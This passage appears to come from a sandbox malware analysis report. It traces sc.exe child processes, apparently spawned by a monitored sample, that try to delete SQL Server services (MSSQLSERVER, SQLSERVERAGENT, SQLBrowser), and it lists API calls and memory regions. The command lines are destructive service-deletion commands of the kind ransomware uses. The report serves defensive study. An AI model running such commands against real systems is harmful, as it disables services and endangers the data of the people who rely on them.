HeapInformationLength=0x0) returned 1 [0077.442] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0077.442] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0077.442] _wcsicmp (_String1="delete", _String2="query") returned -13 [0077.442] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0077.442] _wcsicmp (_String1="delete", _String2="start") returned -15 [0077.442] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0077.442] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0077.442] _wcsicmp (_String1="delete", _String2="control") returned 1 [0077.442] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0077.442] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0077.442] _wcsicmp (_String1="delete", _String2="config") returned 1 [0077.442] _wcsicmp (_String1="delete", _String2="description") returned -7 [0077.442] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0077.442] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0077.442] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0077.442] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0077.442] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0077.442] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0077.442] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0077.443] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0077.443] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0077.443] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0077.443] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0077.443] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0077.443] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0077.443] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0077.443] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0077.443] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0077.443] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0077.443] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0077.443] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0077.443] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0077.443] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0077.443] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0077.445] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0xb0b08c8af0 [0077.449] OpenServiceW (hSCManager=0xb0b08c8af0, lpServiceName="MSSQLFDLauncher", dwDesiredAccess=0x10000) returned 0x0 [0077.449] GetLastError () returned 0x424 [0077.449] _ultow (in: _Dest=0x424, _Radix=-1334118168 | out: _Dest=0x424) returned="1060" [0077.449] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x7ff67ae41640, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0077.450] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0xb0b07af8a0, nSize=0x2, Arguments=0xb0b07af8d0 | out: lpBuffer="顐낌°") returned 0x62 [0077.451] GetFileType (hFile=0x24) returned 0x2 [0077.451] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0xb0b07af850 | out: lpMode=0xb0b07af850) returned 1 [0077.463] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0xb0b08c9850*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0xb0b07af848, lpReserved=0x0 | out: lpBuffer=0xb0b08c9850*, lpNumberOfCharsWritten=0xb0b07af848*=0x62) returned 1 [0077.464] LocalFree (hMem=0xb0b08c9850) returned 0x0 [0077.464] LocalFree (hMem=0x0) returned 0x0 [0077.464] CloseServiceHandle (hSCObject=0xb0b08c8af0) returned 1 [0077.464] LocalFree (hMem=0x0) returned 0x0 [0077.464] exit (_Code=1060) Thread: id = 329 os_tid = 0x12c8 Process: id = "13" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0x6784d000" os_pid = "0x82c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"MSSQLSERVER\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 338 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 339 start_va = 0xad39d90000 end_va = 0xad39daffff entry_point = 0x0 region_type = private name = "private_0x000000ad39d90000" filename = "" Region: id = 340 start_va = 0xad39db0000 end_va = 0xad39dc3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ad39db0000" filename = "" Region: id = 341 start_va = 0xad39dd0000 end_va = 0xad39e4ffff entry_point = 0x0 region_type = private name = "private_0x000000ad39dd0000" filename = "" Region: id = 342 start_va = 0xad39e50000 end_va = 0xad39e53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ad39e50000" filename = "" Region: id = 343 start_va = 0xad39e60000 end_va = 0xad39e60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ad39e60000" filename = "" Region: id = 344 start_va = 0xad39e70000 end_va = 0xad39e71fff entry_point = 0x0 region_type = private name = "private_0x000000ad39e70000" filename = "" Region: id = 345 start_va = 0x7df5ffa70000 end_va = 0x7ff5ffa6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffa70000" filename = "" Region: id = 346 start_va = 0x7ff67a980000 end_va = 0x7ff67a9a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a980000" filename = "" Region: id = 347 start_va = 0x7ff67a9aa000 end_va = 0x7ff67a9aafff entry_point = 0x0 region_type = private name = "private_0x00007ff67a9aa000" filename = "" Region: id = 348 start_va = 0x7ff67a9ae000 end_va = 0x7ff67a9affff entry_point = 0x0 region_type = private name = "private_0x00007ff67a9ae000" filename = "" Region: id = 349 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 350 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 456 start_va = 0xad39ec0000 end_va = 0xad39fbffff entry_point = 0x0 region_type = private name = "private_0x000000ad39ec0000" filename = "" Region: id = 457 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 458 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4721 start_va = 0xad39d90000 end_va = 0xad39d9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000ad39d90000" filename = "" Region: id = 4722 start_va = 0xad39da0000 end_va = 0xad39da6fff entry_point = 0x0 region_type = private name = "private_0x000000ad39da0000" filename = "" Region: id = 4723 start_va = 0xad39fc0000 end_va = 0xad3a07dfff entry_point = 0xad39fc0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4724 start_va = 0xad3a080000 end_va = 0xad3a0fffff entry_point = 0x0 region_type = private name = "private_0x000000ad3a080000" filename = "" Region: id = 4725 start_va = 0xad3a200000 end_va = 0xad3a20ffff entry_point = 0x0 region_type = private name = "private_0x000000ad3a200000" filename = "" Region: id = 4726 start_va = 0x7ff67a880000 end_va = 0x7ff67a97ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a880000" filename = "" Region: id = 4727 start_va = 0x7ff67a9ac000 end_va = 0x7ff67a9adfff entry_point = 0x0 region_type = private name = "private_0x00007ff67a9ac000" filename = "" Region: id = 4728 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4729 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4749 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4750 start_va = 0xad39e80000 end_va = 0xad39e86fff entry_point = 0x0 region_type = private name = "private_0x000000ad39e80000" filename = "" Region: id = 4751 start_va = 0xad3a100000 end_va = 0xad3a1defff entry_point = 0xad3a100000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 4752 start_va = 0xad39e90000 end_va = 0xad39ea1fff entry_point = 0xad39e90000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 14 os_tid = 0xb58 [0071.977] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0071.977] __set_app_type (_Type=0x1) [0071.977] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0071.977] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0071.978] SetThreadUILanguage (LangId=0x0) returned 0x409 [0072.177] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0072.177] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0072.177] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0072.177] _wcsicmp (_String1="delete", _String2="query") returned -13 [0072.177] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0072.177] _wcsicmp (_String1="delete", _String2="start") returned -15 [0072.177] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0072.177] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0072.177] _wcsicmp (_String1="delete", _String2="control") returned 1 [0072.177] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0072.177] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0072.177] _wcsicmp (_String1="delete", _String2="config") returned 1 [0072.177] _wcsicmp (_String1="delete", _String2="description") returned -7 [0072.177] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0072.177] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0072.177] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0072.177] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0072.177] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0072.177] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0072.177] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0072.177] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0072.177] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0072.177] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0072.177] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0072.177] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0072.177] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0072.177] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0072.177] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0072.177] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0072.177] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0072.177] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0072.177] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0072.177] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0072.178] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0072.178] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0072.179] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0xad39ec8bf0 [0072.185] OpenServiceW (hSCManager=0xad39ec8bf0, lpServiceName="MSSQLSERVER", dwDesiredAccess=0x10000) returned 0x0 [0072.186] GetLastError () returned 0x424 [0072.186] _ultow (in: _Dest=0x424, _Radix=971307864 | out: _Dest=0x424) returned="1060" [0072.186] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x7ff67ae41640, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0072.188] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0xad39e4fb10, nSize=0x2, Arguments=0xad39e4fb40 | out: lpBuffer="鎰㧬­") returned 0x62 [0072.188] GetFileType (hFile=0x24) returned 0x2 [0072.188] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0xad39e4fac0 | out: lpMode=0xad39e4fac0) returned 1 [0072.306] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0xad39ec93b0*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0xad39e4fab8, lpReserved=0x0 | out: lpBuffer=0xad39ec93b0*, lpNumberOfCharsWritten=0xad39e4fab8*=0x62) returned 1 [0072.306] LocalFree (hMem=0xad39ec93b0) returned 0x0 [0072.307] LocalFree (hMem=0x0) returned 0x0 [0072.307] CloseServiceHandle (hSCObject=0xad39ec8bf0) returned 1 [0072.307] LocalFree (hMem=0x0) returned 0x0 [0072.307] exit (_Code=1060) Thread: id = 309 os_tid = 0x1204 Process: id = "14" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0x66a12000" os_pid = "0x518" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"SQLSERVERAGENT\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 351 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 352 start_va = 0x71e3140000 end_va = 0x71e315ffff entry_point = 0x0 region_type = private name = "private_0x00000071e3140000" filename = "" Region: id = 353 start_va = 0x71e3160000 end_va = 0x71e3173fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000071e3160000" filename = "" Region: id = 354 start_va = 0x71e3180000 end_va = 0x71e31fffff entry_point = 0x0 region_type = private name = "private_0x00000071e3180000" filename = "" Region: id = 355 start_va = 0x71e3200000 end_va = 0x71e3203fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000071e3200000" filename = "" Region: id = 356 start_va = 0x71e3210000 end_va = 0x71e3210fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000071e3210000" filename = "" Region: id = 357 start_va = 0x71e3220000 end_va = 0x71e3221fff entry_point = 0x0 region_type = private name = "private_0x00000071e3220000" filename = "" Region: id = 358 start_va = 0x7df5ff2e0000 end_va = 0x7ff5ff2dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff2e0000" filename = "" Region: id = 359 start_va = 0x7ff679eb0000 end_va = 0x7ff679ed2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff679eb0000" filename = "" Region: id = 360 start_va = 0x7ff679edd000 end_va = 0x7ff679edefff entry_point = 0x0 region_type = private name = "private_0x00007ff679edd000" filename = "" Region: id = 361 start_va = 0x7ff679edf000 end_va = 0x7ff679edffff entry_point = 0x0 region_type = private name = "private_0x00007ff679edf000" filename = "" Region: id = 362 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 363 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 459 start_va = 0x71e32a0000 end_va = 0x71e339ffff entry_point = 0x0 region_type = private name = "private_0x00000071e32a0000" filename = "" Region: id = 460 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 461 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4227 start_va = 0x71e3140000 end_va = 0x71e314ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000071e3140000" filename = "" Region: id = 4228 start_va = 0x71e3150000 end_va = 0x71e3156fff entry_point = 0x0 region_type = private name = "private_0x00000071e3150000" filename = "" Region: id = 4229 start_va = 0x71e33a0000 end_va = 0x71e345dfff entry_point = 0x71e33a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4230 start_va = 0x71e3460000 end_va = 0x71e34dffff entry_point = 0x0 region_type = private name = "private_0x00000071e3460000" filename = "" Region: id = 4231 start_va = 0x71e3610000 end_va = 0x71e361ffff entry_point = 0x0 region_type = private name = "private_0x00000071e3610000" filename = "" Region: id = 4232 start_va = 0x7ff679db0000 end_va = 0x7ff679eaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff679db0000" filename = "" Region: id = 4233 start_va = 0x7ff679edb000 end_va = 0x7ff679edcfff entry_point = 0x0 region_type = private name = "private_0x00007ff679edb000" filename = "" Region: id = 4234 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4235 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4261 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4262 start_va = 0x71e3230000 end_va = 0x71e3236fff entry_point = 0x0 region_type = private name = "private_0x00000071e3230000" filename = "" Region: id = 4263 start_va = 0x71e34e0000 end_va = 0x71e35befff entry_point = 0x71e34e0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 4264 start_va = 0x71e3240000 end_va = 0x71e3251fff entry_point = 0x71e3240000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\System32\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sc.exe.mui") Thread: id = 15 os_tid = 0x244 [0069.150] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff67ae30000 [0069.150] __set_app_type (_Type=0x1) [0069.150] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff67ae31f00) returned 0x0 [0069.150] __wgetmainargs (in: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038, _DoWildCard=0, _StartInfo=0x7ff67ae41044 | out: _Argc=0x7ff67ae41028, _Argv=0x7ff67ae41030, _Env=0x7ff67ae41038) returned 0 [0069.150] SetThreadUILanguage (LangId=0x0) returned 0x409 [0069.356] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0069.356] GetStdHandle (nStdHandle=0xfffffff5) returned 0x24 [0069.356] wcsncmp (_String1="de", _String2="\\\\", _MaxCount=0x2) returned 8 [0069.356] _wcsicmp (_String1="delete", _String2="query") returned -13 [0069.356] _wcsicmp (_String1="delete", _String2="queryex") returned -13 [0069.356] _wcsicmp (_String1="delete", _String2="start") returned -15 [0069.356] _wcsicmp (_String1="delete", _String2="pause") returned -12 [0069.356] _wcsicmp (_String1="delete", _String2="interrogate") returned -5 [0069.356] _wcsicmp (_String1="delete", _String2="control") returned 1 [0069.356] _wcsicmp (_String1="delete", _String2="continue") returned 1 [0069.356] _wcsicmp (_String1="delete", _String2="stop") returned -15 [0069.356] _wcsicmp (_String1="delete", _String2="config") returned 1 [0069.356] _wcsicmp (_String1="delete", _String2="description") returned -7 [0069.356] _wcsicmp (_String1="delete", _String2="failure") returned -2 [0069.357] _wcsicmp (_String1="delete", _String2="privs") returned -12 [0069.357] _wcsicmp (_String1="delete", _String2="failureflag") returned -2 [0069.357] _wcsicmp (_String1="delete", _String2="triggerinfo") returned -16 [0069.357] _wcsicmp (_String1="delete", _String2="sidtype") returned -15 [0069.357] _wcsicmp (_String1="delete", _String2="managedaccount") returned -9 [0069.357] _wcsicmp (_String1="delete", _String2="preferrednode") returned -12 [0069.357] _wcsicmp (_String1="delete", _String2="qc") returned -13 [0069.357] _wcsicmp (_String1="delete", _String2="qdescription") returned -13 [0069.357] _wcsicmp (_String1="delete", _String2="qfailure") returned -13 [0069.357] _wcsicmp (_String1="delete", _String2="qprivs") returned -13 [0069.357] _wcsicmp (_String1="delete", _String2="qfailureflag") returned -13 [0069.357] _wcsicmp (_String1="delete", _String2="qtriggerinfo") returned -13 [0069.357] _wcsicmp (_String1="delete", _String2="qsidtype") returned -13 [0069.357] _wcsicmp (_String1="delete", _String2="showsid") returned -15 [0069.357] _wcsicmp (_String1="delete", _String2="qpreferrednode") returned -13 [0069.357] _wcsicmp (_String1="delete", _String2="qmanagedaccount") returned -13 [0069.357] _wcsicmp (_String1="delete", _String2="querylock") returned -13 [0069.357] _wcsicmp (_String1="delete", _String2="qprotection") returned -13 [0069.357] _wcsicmp (_String1="delete", _String2="lock") returned -8 [0069.357] _wcsicmp (_String1="delete", _String2="delete") returned 0 [0069.357] ResolveDelayLoadedAPI () returned 0x7ffc02114740 [0069.359] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x71e32a89a0 [0069.364] OpenServiceW (hSCManager=0x71e32a89a0, lpServiceName="SQLSERVERAGENT", dwDesiredAccess=0x10000) returned 0x0 [0069.365] GetLastError () returned 0x424 [0069.365] _ultow (in: _Dest=0x424, _Radix=-484443416 | out: _Dest=0x424) returned="1060" [0069.365] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x7ff67ae41640, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0069.367] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x71e31ffaa0, nSize=0x2, Arguments=0x71e31ffad0 | out: lpBuffer="顐q") returned 0x62 [0069.367] GetFileType (hFile=0x24) returned 0x2 [0069.367] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x71e31ffa50 | out: lpMode=0x71e31ffa50) returned 1 [0069.469] WriteConsoleW (in: hConsoleOutput=0x24, lpBuffer=0x71e32a9850*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x71e31ffa48, lpReserved=0x0 | out: lpBuffer=0x71e32a9850*, lpNumberOfCharsWritten=0x71e31ffa48*=0x62) returned 1 [0069.469] LocalFree (hMem=0x71e32a9850) returned 0x0 [0069.469] LocalFree (hMem=0x0) returned 0x0 [0069.469] CloseServiceHandle (hSCObject=0x71e32a89a0) returned 1 [0069.470] LocalFree (hMem=0x0) returned 0x0 [0069.470] exit (_Code=1060) Thread: id = 286 os_tid = 0x11a8 Process: id = "15" image_name = "sc.exe" filename = "c:\\windows\\system32\\sc.exe" page_root = "0xe257000" os_pid = "0xaf8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb14" cmd_line = "sc delete \"SQLBrowser\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 364 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 365 start_va = 0x3f73150000 end_va = 0x3f7316ffff entry_point = 0x0 region_type = private name = "private_0x0000003f73150000" filename = "" Region: id = 366 start_va = 0x3f73170000 end_va = 0x3f73183fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003f73170000" filename = "" Region: id = 367 start_va = 0x3f73190000 end_va = 0x3f7320ffff entry_point = 0x0 region_type = private name = "private_0x0000003f73190000" filename = "" Region: id = 368 start_va = 0x3f73210000 end_va = 0x3f73213fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003f73210000" filename = "" Region: id = 369 start_va = 0x3f73220000 end_va = 0x3f73220fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003f73220000" filename = "" Region: id = 370 start_va = 0x3f73230000 end_va = 0x3f73231fff entry_point = 0x0 region_type = private name = "private_0x0000003f73230000" filename = "" Region: id = 371 start_va = 0x7df5ffe60000 end_va = 0x7ff5ffe5ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffe60000" filename = "" Region: id = 372 start_va = 0x7ff67a6b0000 end_va = 0x7ff67a6d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff67a6b0000" filename = "" Region: id = 373 start_va = 0x7ff67a6dd000 end_va = 0x7ff67a6defff entry_point = 0x0 region_type = private name = "private_0x00007ff67a6dd000" filename = "" Region: id = 374 start_va = 0x7ff67a6df000 end_va = 0x7ff67a6dffff entry_point = 0x0 region_type = private name = "private_0x00007ff67a6df000" filename = "" Region: id = 375 start_va = 0x7ff67ae30000 end_va = 0x7ff67ae45fff entry_point = 0x7ff67ae30000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\System32\\sc.exe" (normalized: "c:\\windows\\system32\\sc.exe") Region: id = 376 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 462 start_va = 0x3f73320000 end_va = 0x3f7341ffff 